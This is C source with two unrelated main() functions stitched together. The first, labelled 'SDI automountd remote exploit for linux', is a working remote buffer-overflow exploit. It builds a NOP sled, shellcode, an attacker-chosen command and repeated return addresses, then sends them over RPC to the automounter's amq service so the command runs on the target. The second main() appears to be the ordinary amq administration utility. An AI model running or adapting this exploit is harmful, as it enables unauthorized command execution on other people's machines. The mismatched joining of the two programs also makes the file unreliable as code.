int main ( int argc, char *argv[] ) {
CLIENT *cl;
struct timeval tv;
struct sockaddr_in sa;
struct hostent *he;
char buf[8000], *path = buf, comm[200], *host, *cc;
int sd, res, x, y, offset=0, c, port=0, damn=0, udp=0;
long addr = 0xbffff505;
while ((c = getopt(argc, argv, "h:p:c:o:u")) != -1)
switch (c) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'c':
cc = optarg;
break;
case 'o':
offset = atoi ( optarg);
break;
case 'u':
udp = 1;
break;
default:
damn = 1;
break;
}
if (!host || !cc || damn) usage ( argv[0]);
sa.sin_family = AF_INET;
he = gethostbyname ( host);
if (!he) {
if ( (sa.sin_addr.s_addr = inet_addr ( host)) == INADDR_NONE) {
printf ( "unknown host, try again pal!\n");
exit ( 0);
}
} else
bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
sa.sin_port = htons(port);
sd = RPC_ANYSOCK;
tv.tv_sec = 10;
tv.tv_usec = 0;
snprintf ( comm, sizeof(comm), "%s", cc);
if ( strlen(comm) >= 160) {
printf ( "command too long\n");
exit (0);
} else {
comm[strlen(comm)] = ';';
for ( x = strlen(comm); x < 160; x++)
comm[x] = 'A';
}
addr += offset;
for ( x = 0; x < (1001-(strlen(shellcode)+strlen(comm))); x++)
buf[x] = NOP;
for ( y = 0; y < strlen(shellcode); x++, y++)
buf[x] = shellcode[y];
for ( y = 0; y < strlen(comm); x++, y++)
buf[x] = comm[y];
printf ( "SDI automountd remote exploit for linux\n");
printf ( "Host %s \nRET 0x%x \nOFFset %d \n", host, addr, offset);
for ( ; x < 1020; x+=4) {
buf[x ] = (addr & 0x000000ff);
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
buf[strlen(buf)] = '\0';
if (!udp) {
if ((cl = clnttcp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, &sd, 0, 0)) ==
NULL)
{
clnt_pcreateerror("clnt_create");
exit (-1);
}
} else {
if ((cl = clntudp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, tv, &sd)) ==
NULL)
{
clnt_pcreateerror("clnt_create");
exit (-1);
}
}
printf ( "PORT %d \n", ntohs(sa.sin_port));
printf ( "Command: %s \n", cc);
amqproc_mount_1 (&path, cl);
clnt_destroy ( cl);
}
/*
* MAIN
*/
int
main(int argc, char *argv[])
{
int nodefault = 0, opt_ch, errs = 0, s;
struct sockaddr_in server_addr;
struct hostent *hp;
CLIENT *clnt;
char *server;
/*
* Parse arguments
*/
while ((opt_ch = getopt(argc, argv, "fh:l:msuvx:D:M:")) != -1)
switch (opt_ch) {
case 'f':
flush_flag = 1;
nodefault = 1;
break;
case 'h':
def_server = optarg;
break;
case 'l':
logfile = optarg;
nodefault = 1;
break;
case 'm':
minfo_flag = 1;
nodefault = 1;
break;
case 's':
stats_flag = 1;
nodefault = 1;
break;
case 'u':
unmount_flag = 1;
nodefault = 1;
break;
case 'v':
getvers_flag = 1;
nodefault = 1;
break;
case 'x':
xlog_optstr = optarg;
nodefault = 1;
break;
case 'D':
debug_opts = optarg;
nodefault = 1;
break;
case 'M':
mount_map = optarg;
nodefault = 1;
break;
default:
errs = 1;
break;
}
if (optind == argc) {
if (unmount_flag)
errs = 1;
}
if (errs) {
show_usage:
fprintf(stderr, "usage: %s [-fmsuv] [-h hostname] "
"[directory ...]\n", __progname);
exit(1);
}
server = def_server;
/*
* Get address of server
*/
if ((hp = gethostbyname(server)) == 0 && strcmp(server, localhost) != 0) {
fprintf(stderr, "%s: Can't get address of %s\n", __progname, server);
exit(1);
}
bzero(&server_addr, sizeof server_addr);
server_addr.sin_family = AF_INET;
if (hp) {
bcopy((void *)hp->h_addr, (void *)&server_addr.sin_addr,
sizeof(server_addr.sin_addr));
} else {
/* fake "localhost" */
server_addr.sin_addr.s_addr = htonl(0x7f000001);
}
/*
* Create RPC endpoint
*/
s = privsock(SOCK_STREAM);
clnt = clnttcp_create(&server_addr, AMQ_PROGRAM, AMQ_VERSION, &s, 0, 0);
if (clnt == 0) {
close(s);
s = privsock(SOCK_DGRAM);
clnt = clntudp_create(&server_addr, AMQ_PROGRAM,
AMQ_VERSION, TIMEOUT, &s);
}
if (clnt == 0) {
fprintf(stderr, "%s: ", __progname);
clnt_pcreateerror(server);
exit(1);
}
/*
* Control debugging
*/
if (debug_opts) {
int *rc;
amq_setopt opt;
opt.as_opt = AMOPT_DEBUG;
opt.as_str = debug_opts;
rc = amqproc_setopt_1(&opt, clnt);
if (rc && *rc < 0) {
fprintf(stderr,
"%s: daemon not compiled for debug", __progname);
errs = 1;
} else if (!rc || *rc > 0) {
fprintf(stderr,
"%s: debug setting for \"%s\" failed\n",
__progname, debug_opts);
errs = 1;
}
}
/*
* Control logging
*/
if (xlog_optstr) {
int *rc;
amq_setopt opt;
opt.as_opt = AMOPT_XLOG;
opt.as_str = xlog_optstr;
rc = amqproc_setopt_1(&opt, clnt);
if (!rc || *rc) {
fprintf(stderr, "%s: setting log level to \"%s\" failed\n",
__progname, xlog_optstr);
errs = 1;
}
}
/*
* Control log file
*/
if (logfile) {
int *rc;
amq_setopt opt;
opt.as_opt = AMOPT_LOGFILE;
opt.as_str = logfile;
rc = amqproc_setopt_1(&opt, clnt);
if (!rc || *rc) {
fprintf(stderr, "%s: setting logfile to \"%s\" failed\n",
__progname, logfile);
errs = 1;
}
}
/*
* Flush map cache
*/
if (flush_flag) {
int *rc;
amq_setopt opt;
opt.as_opt = AMOPT_FLUSHMAPC;
opt.as_str = "";
rc = amqproc_setopt_1(&opt, clnt);
if (!rc || *rc) {
fprintf(stderr,
"%s: amd on %s cannot flush the map cache\n",
__progname, server);
errs = 1;
}
}
/*
* Mount info
*/
if (minfo_flag) {
int dummy;
amq_mount_info_list *ml = amqproc_getmntfs_1(&dummy, clnt);
if (ml) {
int mwid = 0, dwid = 0, twid = 0;
show_mi(ml, Calc, &mwid, &dwid, &twid);
mwid++; dwid++; twid++;
show_mi(ml, Full, &mwid, &dwid, &twid);
} else {
fprintf(stderr, "%s: amd on %s cannot provide mount info\n",
__progname, server);
}
}
/*
* Mount map
*/
if (mount_map) {
int *rc;
do {
rc = amqproc_mount_1(&mount_map, clnt);
} while (rc && *rc < 0);
if (!rc || *rc > 0) {
if (rc)
errno = *rc;
else
errno = ETIMEDOUT;
fprintf(stderr, "%s: could not start new ", __progname);
perror("autmount point");
}
}
/*
* Get Version
*/
if (getvers_flag) {
amq_string *spp = amqproc_getvers_1((void *)0, clnt);
if (spp && *spp) {
printf("%s.\n", *spp);
free(*spp);
} else {
fprintf(stderr, "%s: failed to get version information\n",
__progname);
errs = 1;
}
}
/*
* Apply required operation to all remaining arguments
*/
if (optind < argc) {
do {
char *fs = argv[optind++];
if (unmount_flag) {
/*
* Unmount request
*/
amqproc_umnt_1(&fs, clnt);
} else {
/*
* Stats request
*/
amq_mount_tree_p *mtp = amqproc_mnttree_1(&fs, clnt);
if (mtp) {
amq_mount_tree *mt = *mtp;
if (mt) {
int mwid = 0, dwid = 0, twid = 0;
show_mt(mt, Calc, &mwid, &dwid, &twid);
mwid++;
dwid++;
twid++;
printf("%-*.*s Uid Getattr "
"Lookup RdDir RdLnk "
"Statfs Mounted@\n",
dwid, dwid, "What");
show_mt(mt, Stats, &mwid, &dwid, &twid);
} else {
fprintf(stderr,
"%s: %s not automounted\n",
__progname, fs);
}
xdr_pri_free(xdr_amq_mount_tree_p, mtp);
} else {
fprintf(stderr, "%s: ", __progname);
clnt_perror(clnt, server);
errs = 1;
}
}
} while (optind < argc);
} else if (unmount_flag) {
goto show_usage;
} else if (stats_flag) {
amq_mount_stats *ms = amqproc_stats_1((void *)0, clnt);
if (ms) {
show_ms(ms);
} else {
fprintf(stderr, "%s: ", __progname);
clnt_perror(clnt, server);
errs = 1;
}
} else if (!nodefault) {
amq_mount_tree_list *mlp = amqproc_export_1((void *)0, clnt);
if (mlp) {
enum show_opt e = Calc;
int mwid = 0, dwid = 0, pwid = 0;
while (e != ShowDone) {
int i;
for (i = 0; i < mlp->amq_mount_tree_list_len; i++) {
show_mt(mlp->amq_mount_tree_list_val[i],
e, &mwid, &dwid, &pwid);
}
mwid++;
dwid++;
pwid++;
if (e == Calc)
e = Short;
else if (e == Short)
e = ShowDone;
}
} else {
fprintf(stderr, "%s: ", __progname);
clnt_perror(clnt, server);
errs = 1;
}
}
exit(errs);
}
